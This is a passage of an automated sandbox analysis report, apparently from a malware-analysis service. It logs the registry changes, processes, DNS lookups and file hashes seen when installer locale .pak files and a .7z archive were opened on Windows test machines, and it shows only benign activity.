Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-PT.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\pt-PT.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\pt-PT.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 ad9da2057b649935b95bf69dc244ad98
SHA1 c5c6ba286cfed3c95c1f3ceb7eda48af369be319
SHA256 13158d4da1cfaa81a19522ef4fb57df0d93f6f27bbfce98166e88cfb7738bb11
SHA512 78ce009c37d8a324353e8da010d7c5c555c4b4d66b3c3db460f2710f230c2224b1fe17dd7d2402f217abc19c6791740d2742e5a2e0ed8f023c00d5ad2f70ecd0

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:19

Platform

win10v2004-20240508-en

Max time kernel

48s

Max time network

58s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-PT.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-PT.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:19

Platform

win10v2004-20240226-en

Max time kernel

148s

Max time network

175s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sk.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sk.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4088 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 13.107.253.67:443 tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 172.217.169.74:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 74.169.217.172.in-addr.arpa udp

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

158s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sv.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sv.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win10v2004-20240508-en

Max time kernel

146s

Max time network

154s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3704,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3748 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win10v2004-20240508-en

Max time kernel

48s

Max time network

62s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sl.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sl.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20240419-en

Max time kernel

118s

Max time network

127s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sv.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sv.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\sv.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\sv.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 2b7ab12bd3b8be3a91cfc102b954f0fb
SHA1 bf50b8132b7b2971a4dc2855a50215e896ff8f0d
SHA256 7a967a6c1763fe5151f442c9180bc714c64d3b6a936a0f8e0f746fda435da260
SHA512 447abe3467f293859fabd0575ea7452bb01d110482453ffc0ad65706bd25991c53a1fdfc4871be80cfe9c1191e522877a0729a88a7c9ec1f90d535282bf5d926

Analysis: behavioral28

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win10v2004-20240611-en

Max time kernel

89s

Max time network

156s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sw.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sw.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win10v2004-20240508-en

Max time kernel

48s

Max time network

55s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ta.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ta.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20240611-en

Max time kernel

121s

Max time network

133s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\te.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\te.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\te.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\te.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 dba49ff98d44010b45ce0a56fa9b09c8
SHA1 c7193a670368618c636cae614629335ff3652bab
SHA256 ad405a00f837e8865d038321c4b61abe5381b827828cd5e16f0157a7e08619e2
SHA512 4c5ad83a3e13e55c22cf9dad29742780e5a71aff2c15ccb38a000147deffc861f1cea8369aaff9e068bda66ef1f632d74ee118d4c2bcf08c76c247a851a82d44

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:19

Platform

win7-20240221-en

Max time kernel

121s

Max time network

134s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sl.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sl.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\sl.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\sl.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 bf5a32136a6370e3e42a924dc1a36a9d
SHA1 7c11196ab0a439a46dbbb8fb2a07da16f41ded71
SHA256 ff6923d641ef2fad3a916bf82d428f0d3daaacadf4019f42e72f3adee689a682
SHA512 ffd638373c5899850e3ec05c403f86cd1492184af5d7a93690d9f8310a0e669ce62f75bed2697a353f50eeba1b0612703ee71e8faec3e214ba1fb68c124fae7e

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20240221-en

Max time kernel

119s

Max time network

127s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-BR.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-BR.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\pt-BR.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\pt-BR.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 e43904e41f87b3b5818abc4574826e13
SHA1 edf49c1baa657baf7de436bfd63bc296d3305126
SHA256 fc19119446a24090f9c3d95a5c024889c2bc9cd22c40a2bd03e0843300d233b7
SHA512 331099a0c9375b4a2f172eef123d2c1ce15a9028ea2c96c952a689c78a77418ef5a76b50bffbe13b8b171c82b95c3ab4a9c96d29419350f978fa2817d04e97ee

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20240611-en

Max time kernel

117s

Max time network

125s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ru.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ru.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\ru.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\ru.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 81d85baab9a88e782381c119a47352e6
SHA1 e902493002b5ed37e9092aea0d53df3833c3f293
SHA256 ca8413c747403880a907b898d90ae542be4f018492a8d31a401161c15c56d57d
SHA512 c1ce839c9fb9a74bd61f36ada58f9b5e8aba5fba0d998d4a029f73a7ef98a0c3aeb784f1b7c13a766092e73d6dcbddf082bdc2f160a19162476f49c9c1d36845

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win10v2004-20240611-en

Max time kernel

145s

Max time network

157s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sr.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sr.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20240508-en

Max time kernel

117s

Max time network

121s

Command Line
